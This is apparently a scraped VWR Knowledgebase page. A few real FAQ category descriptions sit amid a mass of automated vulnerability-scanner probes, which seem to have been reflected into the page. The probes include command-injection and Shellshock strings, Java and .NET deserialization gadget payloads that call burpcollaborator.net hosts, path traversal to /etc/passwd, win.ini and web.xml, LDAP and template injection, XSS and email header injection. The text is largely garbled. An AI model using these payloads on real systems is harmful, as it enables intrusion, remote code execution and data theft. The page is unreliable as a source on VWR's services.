Knowledgebase and FAQs
The VWR Knowledgebase collects all of our frequently asked questions in a single portal. Browse by category or search for published questions and answers. If you can't find an answer to your question, click the 'Ask us a Question' button to send a note to our support team.
Browse Categories
Click the following button to see a magic! Push me
Click the following button to see a magic! Push me
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
AAAA
{"@type":"java.util.HashMap","@keys":[{"@id":3,"@type":"org.springframework.aop.target.HotSwappableTargetSource","target":{"@type":"org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding","value":{"@id":2,"@type":"javax.naming.Reference","className":"foo","addrs":[],"classFactory":"Freddy","classFactoryLocation":"http://g0hkfl1ua4qhs8c0yhgyux06yx4ssh.burpcollaborator.net/"},"context":{"@type":"org.apache.xbean.naming.context.WritableContext","writeLock":null,"bindingsRef":null,"indexRef":null,"cacheReferences":false,"supportReferenceable":false,"checkDereferenceDifferent":false,"assumeDereferenceBound":false,"contextFederation":null,"masterContext":null,"nameInNamespace":null,"parsedNameInNamespace":null,"contextAccess":null,"modifiable":false,"inCall":null},"isRelative":false,"boundObj":{"@ref":2},"name":"foo","className":null,"fullName":null,"isRel":true}},{"@id":1,"@type":"org.springframework.aop.target.HotSwappableTargetSource","target":{"@type":"com.sun.org.apache.xpath.internal.objects.XString","m_obj":"?\u001A\u0001\f","m_parent":null}}],"@items":[{"@ref":3},{"@ref":1}]}
AAAA
BBBBB'|echo f1dd38b8i7 7yi6dq1ljz #xzwx
AAAA
'
AAAA
BBBBB
AAAA
BBBBB"|echo 30xfrn5fj3 bl38x5jksn ||
AAAA
foo: !com.mchange.v2.c3p0.JndiRefForwardingDataSource jndiName: "ldap://qgaafr0yp8ri9y661va687yt4kaayz.burpcollaborator.net/" loginTimeout: 0
AAAA
BBBBB&echo ccesue936z pyy0n3z8fu&
AAAA
foo: !com.mchange.v2.c3p0.WrapperConnectionPoolDataSource userOverridesAsString: "HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064672656464797400c8687474703a2f2f74757264747565313362356c6e316b3966796f396d616377696e6f6563332e62757270636f6c6c61626f7261746f722e6e65742f202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020740003466f6f;"
AAAA
BBBBB
AAAA
BBBBB|echo kajk7yocsx 2vidyc0sjv||a #' |echo kajk7yocsx 2vidyc0sjv||a #|" |echo kajk7yocsx 2vidyc0sjv||a #
AAAA
foo: !com.sun.rowset.JdbcRowSetImpl dataSourceName: "ldap://bydvxcij7t93rjorjgsrqsgem5sxgm.burpcollaborator.net/" autoCommit: true
AAAA
BBBBB&nslookup -q=cname 7hpa36anrvusn85e8u18v7humlsmgc47syil99y.burpcollaborator.net.&'\"`0&nslookup -q=cname 7hpa36anrvusn85e8u18v7humlsmgc47syil99y.burpcollaborator.net.&`'
AAAA
BBBBB
AAAA
BBBBB'"`0&nslookup -q=cname 6ry9d5km1u4rx7fditb756rtwk2lqbe82zsmja8.burpcollaborator.net.&`'
AAAA
BA==
AAAA
BBBBB|nslookup -q=cname ytv1fxme3m6jzzh5kldz7ytlyc4ds3gz4qudl1a.burpcollaborator.net.&
AAAA
java.util.TreeMa�org.apache.commons.beanutils.BeanComparato�java.util.Collections$ReverseComparato�databaseMetaDat�com.sun.rowset.JdbcRowSetImp���ldap://oyq6awuikor9thjyu8xux7hcv31tpi.burpcollaborator.net/ �java.util.Vecto� java.util.Hashtabl�� fo�
AAAA
BBBBB
AAAA
nslookup -q=cname lj8o5kc1t9w6pm7sa83mxlj8ozu0iq6j970xnobd.burpcollaborator.net.&
AAAA
AQBqYXZhLnV0aWwuVHJlZU1h8AEBAW9yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b/IBAQJqYXZhLnV0aWwuQ29sbGVjdGlvbnMkUmV2ZXJzZUNvbXBhcmF0b/IBAWRhdGFiYXNlTWV0YURhdOECAQNjb20uc3VuLnJvd3NldC5KZGJjUm93U2V0SW1w7AEAAAAAAOAPAAHJA2xkYXA6Ly9mYXR4bW42OXdmMzA1OHZwNno5bDl5dDM3dWRsMWEuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgAdAPAAEEamF2YS51dGlsLlZlY3Rv8gEKAgECAQIBAgECAQIBAgECAQIBAgEEAAAAAAEFamF2YS51dGlsLkhhc2h0YWJs5QEAAAABANgPAAAAAQQBCgMBZm/vAAAAAAAAAAAAAAEDBgEDBgEDBg==
AAAA
http://j3nmpiwzd7g49krqu6nkhj368xey2oqee54svgk.burpcollaborator.net/?BBBBB
AAAA
java.util.HashMa��org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor�ldap://ftcx5np9ffm0o8eppzslsyc3quwmkb.burpcollaborator.net/ org.springframework.jndi.support.SimpleJndiBeanFactor�org.springframework.jndi.JndiTemplat�org.apache.commons.logging.impl.NoOpLo�java.util.HashSe�org.springframework.aop.TruePointcu�
AAAA
BBBBB
AAAA
AQBqYXZhLnV0aWwuSGFzaE1h8AECAQHCAW9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLnN1cHBvcnQuRGVmYXVsdEJlYW5GYWN0b3J5UG9pbnRjdXRBZHZpc29yAQHJA2xkYXA6Ly8zODlsa2I0eHUzMW8zd3RkNG43OTdtcnI1aWJiejAuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgAQJvcmcuc3ByaW5nZnJhbWV3b3JrLmpuZGkuc3VwcG9ydC5TaW1wbGVKbmRpQmVhbkZhY3RvcvkBAQNvcmcuc3ByaW5nZnJhbWV3b3JrLmpuZGkuSm5kaVRlbXBsYXTlAQABBG9yZy5hcGFjaGUuY29tbW9ucy5sb2dnaW5nLmltcGwuTm9PcExv5wEBBAEBAQABAAEFamF2YS51dGlsLkhhc2hTZfQBAQMEAQABAAABBm9yZy5zcHJpbmdmcmFtZXdvcmsuYW9wLlRydWVQb2ludGN19AEBAQMBAQEAAAABBgwBAQ0=
AAAA
BBBBB
AAAA
BA==
AAAA
java.util.TreeMa�org.apache.commons.beanutils.BeanComparato�java.util.Collections$ReverseComparato�databaseMetaDat�com.sun.rowset.JdbcRowSetImp���ldap://4nsldkv13voini86st7yzsx4ivolca.burpcollaborator.net/ �java.util.Vecto� java.util.Hashtabl�� fo�
AAAA
BBBBB
AAAA
AQBqYXZhLnV0aWwuVHJlZU1h8AEBAW9yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b/IBAQJqYXZhLnV0aWwuQ29sbGVjdGlvbnMkUmV2ZXJzZUNvbXBhcmF0b/IBAWRhdGFiYXNlTWV0YURhdOECAQNjb20uc3VuLnJvd3NldC5KZGJjUm93U2V0SW1w7AEAAAAAAOAPAAHJA2xkYXA6Ly9raTYxODBxaHlianlpeTNtbjkyZXU4c2tkYmoyN3IuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgAdAPAAEEamF2YS51dGlsLlZlY3Rv8gEKAgECAQIBAgECAQIBAgECAQIBAgEEAAAAAAEFamF2YS51dGlsLkhhc2h0YWJs5QEAAAABANgPAAAAAQQBCgMBZm/vAAAAAAAAAAAAAAEDBgEDBgEDBg==
AAAAalert(1)
BBBBB
AAAA
BBBBB
AAAAoir1og1ozp
BBBBB
AAAA
BBBBB
AAAAoir1o%3ca%3eg1ozp
BBBBB
AAAA
BBBBB
AAAA
pei8zpqetc)(!(!(!(objectClass=*)))
AAAA
v0tglmgegy)(!(!(objectClass=*))
AAAA
mgvliw5piv)(!(objectClass=*)
AAAA
w1n256ahjo)(objectClass=*
AAAA
BBBBB
AAAA
cvl/BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
././BBBBB
'
BBBBB
AAAA
./BBBBB
AAAA
.../BBBBB
AAAA
../../../../../../../../../../../../../../../../etc/passwdBBBBB
AAAA
BBBBB
AAAA
BBBBB../../../../../../../../../../../../../../../../etc/passwd
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
/etc/passwd
AAAA
../../../../../../../../../../../../../../../../etc/passwd
AAAA
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniBBBBB
AAAA
BBBBB..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
AAAA
BBBBB
AAAA
c:\windows\win.ini
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
How-to & Technique
This category contains questions and resources on using the products sold on VWR.com.
Technical & Product Information
This category contains questions and answers on product specifications, packaging, and other details to help our customers shop with confidence.
Maintenance
This category contains questions on properly maintaining products sold on VWR.com.
Services
This category contains questions on services offered by Avantor and VWR.
AAAA
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
AAAA
BBBBB"|ping -n 21 127.0.0.1 ||
AAAA
BBBBB'|ping -c 21 127.0.0.1 #
AAAA
BBBBBπng -n 21 127.0.0.1&
AAAA
BBBBB
General
This category contains general, non-product specific questions on Avantor and VWR.
AAAA
BBBBB|ping -c 21 127.0.0.1||x
Website
This category contains Q&A and resources on using VWR.com.
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
${5731*3830}
BBBBB
EAALRnJlZGR5RGVzZXI=
BBBBB
6672*6027
BBBBB
AAAA
{"__type":"ObjectDataProvider:#System.Windows.Data","MethodName":"Start","ObjectInstance":{"__type":"Process:#System.Diagnostics","__identity":"","StartInfo":{"__type":"ProcessStartInfo:#System.Diagnostics","FileName":"cmd.exe","Arguments":"/c nslookup 8nwf0t7cf7gjbaasd3ojk7aocfi56u.burpcollaborator.net"}}}
FreddyDeser
BBBBB
%{2647*8828}
BBBBB
AAAA
{"__type":""}
d
BBBBB
AAAA
AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAMsBL2MgbnNsb29rdXAgNHJ3N29pczhkN3dob2R4dTY2OWVrMzU2ZHhqczdoLmJ1cnBjb2xsYWJvcmF0b3IubmV0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==
AAAA
���� ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089�System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]CountComparerVersionItems�System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] �System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]_comparison"System.DelegateSerializationHolder �/c nslookup 79ea6labvaek6gfxo9rh26n9v01upj.burpcollaborator.net cmd"System.DelegateSerializationHolderDelegatemethod0method10System.DelegateSerializationHolder+DelegateEntry/System.Reflection.MemberInfoSerializationHolder/System.Reflection.MemberInfoSerializationHolder 0System.DelegateSerializationHolder+DelegateEntrytypeassemblytargettargetTypeAssemblytargetTypeName methodName delegateEntry0System.DelegateSerializationHolder+DelegateEntry�System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] Kmscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089System.Diagnostics.ProcessStart /System.Reflection.MemberInfoSerializationHolderName AssemblyName ClassName Signature Signature2 MemberTypeGenericArguments System.Type[] >System.Diagnostics.Process Start(System.String, System.String)>System.Diagnostics.Process Start(System.String, System.String) Compare System.String+Int32 Compare(System.String, System.String)2System.Int32 Compare(System.String, System.String) qSystem.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
{"$type":"
BBBBB
$(sleep 11)
BBBBB
`sleep 11`
BBBBB
AAAA
���� _System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35%System.Management.Automation.PSObjectCliXml� Microsoft.Management.Infrastructure.CimInstance#System.Management.Automation/RunspaceInvoke5 Microsoft.Management.Infrastructure.CimInstance#RunspaceInvoke5 Microsoft.Management.Infrastructure.CimInstance System.Object RunspaceInvoke5 RunspaceInvoke5 System.Windows.Markup.XamlReader[], PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 System.Array System.Object <ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"> <ObjectDataProvider x:Key="LaunchCalc" ObjectType = "{ x:Type Diag:Process}" MethodName = "Start" > <ObjectDataProvider.MethodParameters> <System:String>cmd</System:String> <System:String>/c "nslookup 4sx7pit8e7xhpdyu76ael366exkp8e.burpcollaborator.net " </System:String> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> </ResourceDictionary> System.Collections.ArrayList System.Object RunspaceInvoke5 System.Management.Automation 460929192 <CLASS NAME="RunspaceInvoke5" ><PROPERTY NAME="test1" TYPE ="string" ></PROPERTY></CLASS>
() { :;}; /bin/sleep 11
BBBBB
() { :;}; /bin/sleep 0
BBBBB
'
BBBBB
AAAA
AAEAAAD/
AAAA
BBBBB
AAAA
�
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB> BCC:q6xtspz6gejbcruxxdqrkq6db4h55vtnnbe11sph@burpcollaborator.net ylw: i
AAAA
BBBBB BCC:rqlucqj70f3cwseyheas4rqev516pwdo6cx2kt8i@burpcollaborator.net vix: j
AAAA
BBBBB]]>><
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
llk
AAAA
*)(!(!(!(objectClass=*)))
AAAA
*)(!(!(objectClass=*))
AAAA
*)(!(objectClass=*)
AAAA
BBBBB
AAAA
*)(objectClass=*
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA}}xqejn'/"
BBBBB
AAAA
BBBBB
AAAA
BBBBB
rrijt{{905*227}}bt91s
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
yevyi${637*662}fm3y8
BBBBB
../../WEB-INF/web.xml;x=
BBBBB
test
lllllllllllllllll
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
u272erbr2s><
BBBBB
123123123
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
u272erbr2s%3e%3c
BBBBB
AA==
BBBBB
AAAA
BBBBB
AAAA
BBBBB
{"@class":""}
BBBBB
AAAA
BBBBB
u272erbr2s><
BBBBB
AAAA
BBBBB
zgkr8p80zn
BBBBB
{"class":""}
BBBBB
AAAA
BBBBB
AAAA
BBBBB
zgkr8%3ca%3ep80zn
BBBBB
%c0%ae/WEB-INF/web.xml
BBBBB
AAAA
BBBBB
AAAA
BBBBB
zgkr8p80zn
BBBBB
../WEB-INF/web.xml
BBBBB
AAAA
BBBBB
AAAA
BBBBB
alert(1)
BBBBB
../../WEB-INF/web.xml
BBBBB
AAAA
BBBBB
AAAA
BBBBB
../../../WEB-INF/web.xml
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
%2fetc%2fpasswd
BBBBB
AAAA
BBBBB
AAAA
BBBBB
file:///etc/passwd
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
ddd
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
ChMXRnJlZGR5RGVzZXIA
BBBBB
{!xmlparser v=''}
BBBBB
AAAA
java.util.HashMa�jdk.nashorn.internal.objects.NativeStrin�com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Dat�javax.activation.DataHandle�com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSourc�javax.crypto.CipherInputStrea�javax.crypto.NullCiphe�java.lang.Objec�javax.imageio.spi.FilterIterato� javax.imageio.ImageIO$ContainsFilte� java.lang.ProcessBuilde�java.io.IOExceptio�star� java.lang.Proces� fo� java.util.Collections$EmptyIterato� java.util.ArrayLis��nslookup gj3x9wrdz7kuju4io53av4tge7kz8o.burpcollaborator.net java.lang.ProcessBuilder$NullInputStrea�[Ljava.awt.datatransfer.DataFlavor�
AAAA
BBBBB
AAAA
BBBBB
FreddyDeser
BBBBB
xohm9kav1wvl
BBBBB
AAAA
AQBqYXZhLnV0aWwuSGFzaE1h8AECAQFqZGsubmFzaG9ybi5pbnRlcm5hbC5vYmplY3RzLk5hdGl2ZVN0cmlu5wEAAAAAAAABAmNvbS5zdW4ueG1sLmludGVybmFsLmJpbmQudjIucnVudGltZS51bm1hcnNoYWxsZXIuQmFzZTY0RGF04QEAAQNqYXZheC5hY3RpdmF0aW9uLkRhdGFIYW5kbGXyAQAAAQRjb20uc3VuLnhtbC5pbnRlcm5hbC53cy5lbmNvZGluZy54bWwuWE1MTWVzc2FnZSRYbWxEYXRhU291cmPlAQAAAQVqYXZheC5jcnlwdG8uQ2lwaGVySW5wdXRTdHJlYe0BAQZqYXZheC5jcnlwdG8uTnVsbENpcGhl8gEAAAAAAAEHamF2YS5sYW5nLk9iamVj9AEAAAEIamF2YXguaW1hZ2Vpby5zcGkuRmlsdGVySXRlcmF0b/IBAQlqYXZheC5pbWFnZWlvLkltYWdlSU8kQ29udGFpbnNGaWx0ZfIBAQAAAQEKamF2YS5sYW5nLlByb2Nlc3NCdWlsZGXyAAECAQELamF2YS5pby5JT0V4Y2VwdGlv7gAAAgFzdGFy9AAAAQEBAQxqYXZhLmxhbmcuUHJvY2Vz8wABAAANDgACEAAAERIAAAYABgFmb+8BCAEAAQ1qYXZhLnV0aWwuQ29sbGVjdGlvbnMkRW1wdHlJdGVyYXRv8gEBCgEBDmphdmEudXRpbC5BcnJheUxpc/QBAQMByQNuc2xvb2t1cCBhczZyaXEwNzgxdG9zb2RjeHpjNDR5MmFuMXR1aGouYnVycGNvbGxhYm9yYXRvci5uZXQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAAAADFAAAAAAAAQEAAQ9qYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIkTnVsbElucHV0U3RyZWHtAQAAAAAAAAAAAAEQW0xqYXZhLmF3dC5kYXRhdHJhbnNmZXIuRGF0YUZsYXZvcrsBAQAAAQEDAQEDAQED
AAAA
BBBBB
AAAA
BBBBB
jkhhh
BBBBB
AAAA
java.util.HashMa�jdk.nashorn.internal.objects.NativeStrin�com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Dat�javax.activation.DataHandle�com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSourc�javax.crypto.CipherInputStrea�javax.crypto.NullCiphe�java.lang.Objec�sun.misc.Service$LazyIterato� com.sun.jndi.toolkit.dir.LazySearchEnumerationImp� javax.naming.directory.SearchResul�javax.naming.spi.ContinuationDirContex� javax.naming.CannotProceedExceptio� javax.naming.Referenc�java.util.Vecto�Fredd��http://bdss3rl8t2epdpydi0x5pznb82ew2l.burpcollaborator.net/ Fo�java.util.Collections$UnmodifiableRandomAccessLis�fo�javax.naming.directory.SearchControl�java.util.TreeSe�java.lang.ProcessBuilder$NullInputStrea�[Ljava.awt.datatransfer.DataFlavor�
AAAA
BBBBB
AAAA
BBBBB
@(506*5167)
BBBBB
AAAA
